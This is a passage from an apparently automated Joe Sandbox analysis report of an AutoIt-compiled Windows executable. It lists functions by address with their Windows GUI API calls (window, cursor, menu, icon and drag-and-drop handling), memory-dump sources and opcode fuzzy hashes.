                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 2872485747-248962490
                                                                                                                • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32 ref: 0044A11D
                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                • GetWindowDC.USER32 ref: 0044A277
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1744303182-0
                                                                                                                • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1927566239-0
                                                                                                                • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnumForegroundWindows$ChildDesktop
                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                • API String ID: 4293069593-1919597938
                                                                                                                • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3869813825-0
                                                                                                                • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                Function 00454DAA Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 203windowlibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFreeMoveWindow
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 3474547544-1154884017
                                                                                                                • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                Function 00469681 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                • GetFocus.USER32 ref: 004696E0
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                • Opcode ID: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                                • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                • Opcode Fuzzy Hash: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                                • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                Function 004680EB Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 204windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1441871840-4108050209
                                                                                                                • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                Function 0046F2B0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 826844858-3440237614
                                                                                                                • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
